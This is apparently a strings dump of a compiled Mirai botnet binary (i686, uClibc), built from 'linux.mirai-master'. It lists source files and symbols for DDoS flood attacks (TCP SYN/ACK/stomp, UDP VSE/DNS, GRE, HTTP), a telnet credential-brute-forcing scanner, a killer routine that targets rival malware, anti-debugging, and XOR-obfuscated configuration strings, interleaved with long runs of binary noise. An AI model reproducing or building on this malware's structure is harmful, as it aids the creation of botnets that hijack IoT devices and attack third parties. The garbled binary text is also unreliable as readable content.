PTRh
ZYPS
ZYPS
ZYPS
ZYPS
ZYPS
uaPP
<	u'
%<	u
[^_]
Y[hD
ZYPS
ZYPS
ZYPS
ZYPS
_ZPS
@t~WWj
,0<	v
;/uY
QQhT5
XZhu5
PPhT5
 @t$j
[^_]
[^j	P
[^_]
[^_]
RRj	P
[^_]
[^_]
[^_]
F(QQ
[^_]
[^_]
[^_]
[^_]
[^_]
B VP
[^_]
 j5j
j	VS
< tF<	tB
,0<	w
OBA9
t2r$
JR**
<9.u
F)SP
[^_]
Y[^_]
[^_]
-< t
,0<	
Y[PV
@t&SSj
ZYj	P
[^_]
ZYPV
Y_PS
Y_PS
,0<	
XZWS
ZYPS
Beeb
XZj	
Eleele
PPj	
u%Ph
_Xj	
VVj@
Y[j@P
[^_]
WVSQ
WWj S
_XVj
[^Pj
ucQj
tJRj
Y[j	
RRPV
Y[^_]
[^_]
@t;Sj
@t#h
[^_]
@PVW
48"@9
[^_]
[^_]
@tmPPh
XZh 
unPj	h
@u%j
Y^Pj
Y^Pj
 @t1
^_Rj
[^_]
0[^]
[^_]
[^_]
Y[^_]
,0<	w
[^_]
[^_]
t<Pj
Z[^_]
PRQW
T$(S
T$(S
VShK*
WVS1
D$8=
ShK*
D$ P
D$ Pj
D$ Pj
xAPPSh
UWVS
\$Th
D$8P
T$ ~
#t$ 
2#D$ 
D$8P
[^_]
UWVS
\$4u
t$8R
$9D$
t$8S
\$0PPj
[^_]
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
SSPQ)
[^_]
uXRh
UWVS
 <xu
(<`v
}/C9
D$, D$
t$$h
u%WWSS
ZYSS
[^_]
yPPj
PPShP?
UWVS
D$ P
t@;D$xu
D$ P
t$\Q
[^_]
UWVS
.u5A
Z[^_]
POST /cdn-cgi/
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
http
url=
POST
/proc/net/tcp
/dev/watchdog
/dev/misc/watchdog
abcdefghijklmnopqrstuvw012345678
PMMV
ZOJFKRA
FGDCWNV
HWCLVGAJ
QWRRMPV
RCQQUMPF
WQGP
RCQQ
CFOKL
QOACFOKL
OGKLQO
cFOKLKQVPCVMP
QGPTKAG
QWRGPTKQMP
EWGQV
CFOKL
CFOKLKQVPCVMP
W@LV
HT@XF
CLIM
XNZZ
WHoIM
TKXZT
WHoIM
CFOKL
Q[QVGO
KIU@
FPGCO@MZ
PGCNVGI
DWAIGP
OMVJGP
ogin
enter
assword
@CAI
MRGLMVJGP
AMO"
MRGLMVJGP
AMO"
NKQVGLKLE
JVVRQ
[MWVW
uEzAs"
RPMA
GZG"
FGNGVGF
CLKOG"
QVCVWQ"
pgrmpv
jvvrdnmmf"
nmnlmevdm"
XMNNCPF"
egvnmacnkr"
QJGNN"
GLC@NG"
Q[QVGO"
@WQ[@MZ
okpck"
okpck
CRRNGV
DMWLF"
LAMPPGAV"
@WQ[@MZ
@WQ[@MZ
IKNN
vqMWPAG
gLEKLG
sWGP["
PGQMNT
AMLD"
LCOGQGPTGP
aMLLGAVKML
IGGR
CNKTG"
cAAGRV
VGZV
JVON
CRRNKACVKML
ZJVON	ZON
CRRNKACVKML
KOCEG
UG@R
cAAGRV
nCLEWCEG
aMLVGLV
v[RG
CRRNKACVKML
DMPO
WPNGLAMFGF"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
QGPTGP
ANMWFDNCPG
LEKLZ"
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
ijvon
NKIG
eGAIM
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
ijvon
NKIG
eGAIM
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
ijvon
NKIG
eGAIM
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
ijvon
NKIG
eGAIM
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
kLVGN
cRRNGuG@iKV
ijvon
NKIG
eGAIM
tGPQKML
qCDCPK
/dev/null
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
attack_app_proxy
attack_app_cfnull
attack_app_http
LOCAL_ADDR
attack_get_opt_str
attack_get_opt_ip
attack_get_opt_int
attack_start
attack_parse
attack_kill_all
attack_init
LOCAL_ADDR
methods_len
methods
attack_ongoing
attack_gre_eth
attack_gre_ip
LOCAL_ADDR
attack_tcp_stomp
attack_tcp_ack
attack_tcp_syn
LOCAL_ADDR
attack_udp_plain
attack_udp_generic
attack_udp_vse
attack_udp_dns
LOCAL_ADDR
checksum_generic
checksum_tcpudp
LOCAL_ADDR
killer_kill
killer_kill_by_port
killer_init
LOCAL_ADDR
killer_pid
killer_realpath
killer_realpath_len
main
LOCAL_ADDR
srv_addr
fd_ctrl
fd_serv
pending_connection
resolve_func
rand_next
rand_str
rand_alphastr
rand_init
LOCAL_ADDR
resolv_entries_free
resolv_domain_to_hostname
resolv_lookup
LOCAL_ADDR
scanner_kill
recv_strip_null
scanner_init
LOCAL_ADDR
scanner_pid
rsck
rsck_out
auth_table_len
scanner_rawpkt
auth_table
conn_table
auth_table_max_weight
fake_time
table_retrieve_val
table_lock_val
table_unlock_val
table_init
LOCAL_ADDR
table_key
table
util_strlen
util_memcpy
util_strcpy
util_zero
util_itoa
util_memsearch
util_atoi
util_fdgets
util_local_addr
util_stristr
util_strcmp
util_strncmp
LOCAL_ADDR
!tim
!buf
 seq
 ack
!iph
 __v
 __x
 __v
 __x
 __v
 __x
 __v
 __x
!__v
 __x
!pkt
 iph
 seq
 ack
!iph
 __v
 __x
 __v
 __x
 __v
 __x
!__v
 __x
 __v
 __x
!pkt
 iph
 __v
 __x
!__v
 __x
	tos
	ttl
(dir
(pid
ud&(
up&4
u`+@
*len
*__v
*__v
	str
	len
	str
	len
*iph
*__v
*__x
!tim
*iph
q*iph
%got
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
attack_app.c
stdint.h
attack.h
socket.h
in.h
sockaddr.h
includes.h
select.h
time.h
types.h
unistd.h
?c?GiYeg\
su[k:bhe]:=K
uuYW/Z
:gjLN
?c?GiY
gYe/Z
u[3:bg=h:
uhH?
uuYW/ZVhg
e/2Y=
e/2Y=
e/2Y=
?bg=eg
r>dZrhYe/h
e/jY=
!egjY
gegl
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
attack.c
stdint.h
attack.h
socket.h
in.h
sockaddr.h
includes.h
>w=IY
ott=
>wu;=
<F@h>,>j
MuFF
@*@bB}A
;g/-h
#U1+?Y
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include/linux
/etc/xcompile/i686/bin/../include/asm-generic
attack_gre.c
stdint.h
attack.h
socket.h
in.h
sockaddr.h
includes.h
ip.h
int-ll64.h
types.h
protocol.h
if_ether.h
udp.h
=YegY
=Ye=Y
r<=h>:;?;A=gL:
=;LHL/gK=?i
y<=P
<g>:
=;hHL/gKYI=/Zw9?
yf>:==Ag
]9HL=;g=sL
=YegY
=Ye=Y
s<=idB7BgL:
=;LHL/gK=?b=
yJDg>:
=;hHL/gKYI=/Zw9?
nbeAg
gv>H>/
]9HL=;g=sL
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include/linux
/etc/xcompile/i686/bin/../include/asm-generic
attack_tcp.c
stdint.h
attack.h
socket.h
in.h
sockaddr.h
includes.h
unistd.h
types.h
time.h
tcp.h
types.h
int-ll64.h
ip.h
h,>H
YegY
gYegY
gYegY
gYeg[
xJ=k8AgI?e
gKYe=
uMG=
Ygeg:K=;//e0e
k}>?/
L>dge
=;HL
=YegY
=Ye=Y
=Ye=Y
=Ye=Y
u<=k8Ag
gggK=s=v
:/Y;YuYIK/L
lb@g
L=;HL
=YegY
=Ye=Y
=Ye=Y
=Ye=Y
u<=k8A=e>
gggK=s=v
:/Y;YwKK\KMK
ZxMKK
kc?g
=;HL
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include/linux
/etc/xcompile/i686/bin/../include/asm-generic
attack_udp.c
stdint.h
attack.h
socket.h
in.h
sockaddr.h
includes.h
ip.h
int-ll64.h
types.h
udp.h
alula
protocol.h
=hvv
:>V>/v
?8hsM
f?G?/
=YegY
v<=j9@g
gggK=I=
lb@g
=;HL
=YegY
g\pjY
u<=k8Ag
gggKY;=
kc?g
=;HL
Ks/Y
/;/Y
X+10
t<=l7BaA=
gKYe?
:<=g
cM@7g
h:HLu
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/linux
/etc/xcompile/i686/bin/../include/asm-generic
checksum.c
stdint.h
ip.h
int-ll64.h
types.h
includes.h
N;=WZ/Z
\#[+J
>;;,_/[=L
?9>+
0=[sx
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
killer.c
includes.h
stdint.h
dirent.h
dirent.h
types.h
socket.h
in.h
sockaddr.h
+ 1k
>LF=@FC
g+i0
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include
main.c
socket.h
in.h
sockaddr.h
stdint.h
includes.h
select.h
sigset.h
time.h
types.h
unistd.h
resolv.h
Wl7=i
guh_
v<KO
zXPx
Y;gu
wuIK0
/s/Y{
/etc/xcompile/i686/bin/../include
rand.c
stdint.h
includes.h
W$b>\*0Z:
[ZZ:/[ZZ:=]
-=W=
=Y=:Y
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
resolv.c
stdint.h
resolv.h
includes.h
protocol.h
socket.h
in.h
sockaddr.h
select.h
time.h
types.h
Jt=Lu
gg?9y0
/;==
w<hj
,uuZ
-YAV>
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
/etc/xcompile/i686/bin/../include/linux
/etc/xcompile/i686/bin/../include/asm-generic
scanner.c
scanner.h
stdint.h
includes.h
socket.h
in.h
sockaddr.h
resolv.h
ip.h
int-ll64.h
types.h
tcp.h
select.h
time.h
types.h
unistd.h
?9e=
KW=L
AWp=:hL
{tu;=
@*PhF
0d#c
Z//->;
z i[+=
dhr\hb
uKa`
=WgZ
/W/n;g
/etc/xcompile/i686/bin/../include
table.c
table.h
stdint.h
includes.h
.Z:>
Y/->,==U>]
=Zd0ZK;u
!W/W=
/etc/xcompile/i686/bin/../include
/etc/xcompile/i686/bin/../include/sys
/etc/xcompile/i686/bin/../include/netinet
/etc/xcompile/i686/bin/../include/bits
util.c
includes.h
stdint.h
socket.h
in.h
sockaddr.h
socket.h
types.h
gYZ>Kg
Jgv"
/-=si
$=s=
t~guhZ
. u.
. L.
f. X.
. w.
. L.
a. P.
. Q.
. Q.
. T.
. Q.
. Q.
. Q.
. Q.
C. T.
f. R.
f. W.
. U.
. `.
. J.
i. T.
new_line_pos
start_pos
targs_len
sin_family
sin_addr
err_len
protection_type
dst_addr
attack_option
God A red nugget A fat egg under a dog
end_pos
offset
ipv4_t
sock_addr
short unsigned int
LOCAL_ADDR
sockets
unsigned char
orig_method
/root/Desktop/mirai/linux.mirai-master/mirai
user_agent
sin_port
fdset_wr
sockaddr_in
timeval
__socklen_t
targs
attack_http_state
keepalive
__fd_mask
num_cookies
szbuf
rdbuf_pos
Tacocat
tv_usec
in_addr_t
attack_app_cfnull
to_send
postdata
consumed
last_recv
wait_time
attack_target
long long int
attack_app_proxy
__d0
content_length
__d1
loc_ptr
netmask
nfds
rdbuf
len_ptr
__suseconds_t
cookie_ptr
last_send
rndbuf
opts_len
attack_cfnull_state
fds_bits
generic_memes
bot/attack_app.c
long long unsigned int
sa_family_t
con_ptr
uint8_t
uint16_t
http_table
fdset_rd
chunked
GNU C 4.1.2
__time_t
nl_off
cookie_exists
sin_zero
sent
chunklen
short int
dport
fd_set
s_addr
attack_app_http
uint32_t
__result
processed
tv_sec
equal_off
fake_time
in_port_t
ATTACK_FUNC
val_len
attack_parse
methods_len
attack_get_opt_int
pid2
attack_get_opt_ip
attack_get_opt_str
free_opts
pid1
add_attack
BOOL
attack_method
attack_init
bot/attack.c
cleanup
ATTACK_VECTOR
attack_start
vector
attack_kill_all
attack_ongoing
duration
methods
h_source
__u16
udphdr
__u8
pkts
ethhdr
ent1
ent2
ent3
grehdr
data_len
__u32
iphdr
source_ip
ethh
attack_gre_eth
h_dest
udph
check
attack_gre_ip
dont_frag
protocol
__sum16
daddr
frag_off
tot_len
__be16
greiph
ip_ident
greh
__be32
ip_tos
version
saddr
sport
bot/attack_gre.c
ip_ttl
data_rand
h_proto
gcip
bot/attack_tcp.c
res1
urg_ptr
attack_tcp_stomp
pktbuf
attack_tcp_syn
tcphdr
start_recv
doff
ack_fl
syn_fl
ack_seq
attack_stomp_data
recv_addr_len
urg_fl
rst_fl
window
fin_fl
recv_addr
tcph
psh_fl
attack_tcp_ack
stomp_setup_nums
vse_payload
finished_whitespace
Do nine men interpret Nine men I nod
attack_udp_dns
dns_hdr_id
qrand
attack_udp_vse
resolvbuf
qdcount
domain_len
qname
qclass
nspos
attack_udp_plain
arcount
dnst
num_words
attack_udp_generic
found
get_dns_resolver
curr_lbl
ipbuf
nscount
dnsh
ancount
dnshdr
qtype
bot/attack_udp.c
dns_question
curr_word_len
vse_payload_len
ip_dst
checksum_tcpudp
buff
bot/checksum.c
ip_src
checksum_generic
killer_kill_by_port
fd_str
d_off
killer_highest_pid
ptr_status_path
in_column
has_exe_access
scan_counter
m_qbot_len
memory_scan_match
killer_init
d_type
fd_dir
ptr_path
d_name
str_len
buffer
m_zollard_len
tmp_bind_addr
__dirstream
column_index
m_qbot2_len
killer_realpath_len
__ino_t
matches
listening_state
m_qbot_http
ptr_exe_path
inode
m_qbot3_len
tmp_bind_fd
m_upx_str
dirent
bot/killer.c
k_rp_len
m_upx_len
__off_t
killer_kill
file
port_str
fd_entry
m_qbot_report
killer_pid
d_reclen
last_pid_scan
d_ino
killer_realpath
m_zollard
mem_exists
m_qbot_dup
srv_addr
teardown_connection
fd_ctrl
name_buf
name_buf_len
addrs_len
establish_connection
cli_addr
fd_serv
fdsetwr
resolv_entries
obf_funcs
buf_dst
cli_addr_len
ensure_single_instance
buf_src
tbl_exec_succ_len
tbl_exec_succ
timeo
resolve_func
pending_connection
id_len
fdsetex
fold
argv0
sigs
argc
resolve_cnc_addr
__val
pings
A Santa lives evil at NASA
local_bind
pgid
bot/main.c
id_buf
unlock_tbl_if_nodebug
anti_gdb_entry
__sigset_t
fdsetrd
addrs
entropy
alphaset
rand_init
bot/rand.c
rand_next
rand_str
rand_alphastr
resolv_skip_name
query
reader
resolv_entries_free
dns_id
resolv_lookup
tmp_buf
src_domain
dst_pos
dns_resource
dnsa
jumped
resolv_domain_to_hostname
query_len
dnsans
stop
bot/resolv.c
curr_len
r_data
dst_hostname
fdset
response
_class
auth_table_max_weight
scanner_pid
recv_strip_null
username
enc_user
SC_CONNECTING
get_random_ip
scanner_connection
add_auth_entry
dgram
last_spew
password_len
SC_WAITING_ENABLE_RESP
flags
tmp_len
SC_WAITING_SYSTEM_RESP
source_port
SC_HANDLE_IACS
auth_table_len
prompt_ending
mfd_rd
sock
SC_WAITING_USERNAME
rsck
weight_min
SC_WAITING_SHELL_RESP
random_auth_entry
scanner_auth
tkn_resp
can_consume
paddr
amount
timeout
mfd_wr
iac_wont
consume_any_prompt
consume_resp_prompt
auth_table
tmp_str
scanner_rawpkt
tmp2
setup_connection
consume_user_prompt
enc_pass
scanner_kill
consume_iacs
deobf
report_working
username_len
SC_CLOSED
dst_port
password
scanner_init
last_avail_conn
bot/scanner.c
weight_max
SC_WAITING_PASSWORD
consume_pass_prompt
SC_WAITING_PASSWD_RESP
tmp1
conn_table
SC_WAITING_SH_RESP
SC_WAITING_TOKEN_RESP
rsck_out
table_init
bot/table.c
table_value
add_entry
Degas are we not drawn onward no In union drawn onward to new eras aged
table_key
table_unlock_val
table_lock_val
table_retrieve_val
toggle_obf
util_isupper
util_strlen
bot/util.c
radix
cutoff
r_src
r_dst
util_memsearch
cutlim
util_isdigit
haystack_len
match_count
matched
util_stristr
util_atoi
util_strcmp
accum
util_strncmp
string
base
util_memcpy
util_isalpha
total
str1
str2
util_zero
util_strcpy
util_local_addr
scratch
util_fdgets
util_isspace
mem_len
util_itoa
buffer_size
haystack
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_str
.debug_loc
.debug_ranges
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
Borrow or rob
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
attack_app.c
attack.c
add_attack
attack_gre.c
attack_tcp.c
attack_udp.c
checksum.c
killer.c
mem_exists
main.c
anti_gdb_entry
resolve_cnc_addr
teardown_connection
ensure_single_instance
local_bind.4408
C.26.4504
C.27.4505
rand.c
resolv.c
resolv_skip_name
scanner.c
consume_any_prompt
can_consume
deobf
add_auth_entry
setup_connection
C.40.4671
table.c
toggle_obf
add_entry
util.c
__syscall_fcntl.c
__syscall_fcntl64.c
chdir.c
close.c
fork.c
getpid.c
getppid.c
ioctl.c
kill.c
open.c
prctl.c
read.c
readlink.c
select.c
setsid.c
sigprocmask.c
time.c
unlink.c
write.c
closedir.c
opendir.c
readdir.c
__errno_location.c
clock.c
memcpy.c
memmove.c
memset.c
strcpy.c
inet_makeaddr.c
accept.c
bind.c
connect.c
getsockname.c
getsockopt.c
listen.c
recv.c
recvfrom.c
send.c
sendto.c
setsockopt.c
socket.c
raise.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
_exit.c
clock_getres.c
fstat.c
getdents.c
getdents64.c
getdtablesize.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getrlimit.c
getuid.c
llseek.c
mremap.c
munmap.c
nanosleep.c
sbrk.c
times.c
xstatconv.c
__C_ctype_b.c
errno.c
inet_aton.c
dl-support.c
brk.c
__syscall_error.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__libc_sigaction
strcpy
__GI_fcntl64
__GI_sigaddset
__socketcall
__GI___ctype_b
conn_table
getrlimit
ioctl
__GI_sigaction
__GI_time
getgid
sysconf
__GI_getpagesize
getdtablesize
__GI_h_errno
attack_gre_eth
recv
attack_udp_generic
connect
__GI___uClibc_fini
sigemptyset
__pthread_mutex_lock
__sigdelset
util_stristr
__GI_clock_getres
__uClibc_fini
geteuid
__getdents
__GI_setsid
memmove
__bsd_signal
munmap
__GI_setsockopt
__libc_stack_end
__libc_fcntl
atol
_h_errno
times
__ctype_b
rsck
resolv_domain_to_hostname
errno
getegid
__GI_sbrk
__libc_accept
__GI___uClibc_init
attack_udp_plain
attack_udp_vse
getpagesize
getpid
util_strncmp
__GI_lseek64
__libc_getpid
util_fdgets
fcntl64
attack_get_opt_ip
prctl
attack_tcp_ack
memcpy
creat
rand_init
readlink
__libc_select
recv_strip_null
__libc_nanosleep
__pthread_mutex_init
getuid
malloc
table_unlock_val
sleep
__GI_atol
__GI_read
recvfrom
__dso_handle
__GI_readdir
clock_getres
socket
select
_pthread_cleanup_pop_restore
readdir
__GI___libc_fcntl
__GI_memset
__GI_closedir
__GI_accept
util_atoi
__GI_write
util_memsearch
__libc_read
__GI_opendir
attack_kill_all
__GI_open
sigaddset
__environ
resolve_func
mmap
send
abort
killer_realpath_len
__GI_fcntl
__GI_getgid
killer_realpath
_init
strtol
__libc_lseek64
accept
__malloc_state
__GI___C_ctype_b_data
resolv_lookup
table
scanner_kill
__sigaddset
nanosleep
__GI_send
h_errno
calloc
attack_ongoing
__pthread_mutex_unlock
__register_frame_info_bases
__GI_exit
__app_fini
attack_init
__exit_cleanup
write
environ
__GI_close
fstat
methods
kill
__pthread_mutex_trylock
__GI_brk
bind
__GI_nanosleep
LOCAL_ADDR
__GI_sigprocmask
inet_addr
util_strlen
chdir
util_zero
__raise
setsockopt
bsd_signal
__GI_times
mremap
__GI_kill
__GI_memmove
__pthread_initialize_minimal
__GI_recv
_start
__deregister_frame_info_bases
__GI_ioctl
rand_str
signal
read
attack_tcp_stomp
__xstat64_conv
__GI_memcpy
table_retrieve_val
unlink
sendto
__GI___C_ctype_b
scanner_init
table_key
realloc
__libc_send
killer_init
__GI_recvfrom
__GI_getrlimit
__GI_strcpy
listen
attack_start
malloc_trim
fork
rand_next
__GI_sleep
sigaction
_dl_phdr
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
__getpagesize
__GI_mremap
attack_udp_dns
__syscall_error
__uclibc_progname
__GI_getegid
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
__libc_close
__GI_getpid
inet_aton
util_memcpy
_pthread_cleanup_push_defer
__sigismember
__bss_start
__libc_open
resolv_entries_free
memset
scanner_pid
__GI_socket
main
srv_addr
util_local_addr
table_lock_val
attack_app_cfnull
__syscall_rt_sigaction
__xstat_conv
getppid
__libc_recvfrom
time
opendir
checksum_generic
__GI_abort
__GI__exit
attack_parse
data_start
__GI_sysconf
__h_errno_location
__C_ctype_b_data
fd_serv
util_itoa
_fini
__GI_chdir
attack_tcp_syn
__GI_mmap
__get_pc_thunk_bx
__GI_select
attack_app_http
_stdio_term
__GI_signal
attack_get_opt_int
killer_kill_by_port
attack_app_proxy
__C_ctype_b
__GI_sendto
__GI_sigemptyset
__libc_fork
__atexit_lock
attack_gre_ip
auth_table_max_weight
killer_kill
util_strcmp
__libc_fcntl64
getsockopt
attack_get_opt_str
__GI_unlink
killer_pid
__pagesize
methods_len
__GI_getdtablesize
_edata
__GI_fstat
_end
__GI_listen
util_strcpy
_sigintr
__GI_connect
__curbrk
__GI_readlink
_dl_phnum
scanner_rawpkt
__errno_location
pending_connection
_stdlib_strto_l
__GI___libc_open
exit
_stdio_init
__GI_geteuid
auth_table_len
checksum_tcpudp
_dl_aux_init
table_init
_errno
atoi
fd_ctrl
__GI_inet_aton
__GI_bind
auth_table
_exit
__libc_recv
__getdents64
__libc_creat
lseek64
open
__libc_write
__malloc_consolidate
__GI_strtol
__GI_getuid
clock
__GI_errno
__libc_sendto
fake_time
__GI_raise
__data_start
setsid
__GI_inet_addr
closedir
_Jv_RegisterClasses
__GI___errno_location
fcntl
rsck_out
__GI_atoi
__GI_getsockname
close
rand_alphastr
__libc_connect
raise
free
sigprocmask
getsockname
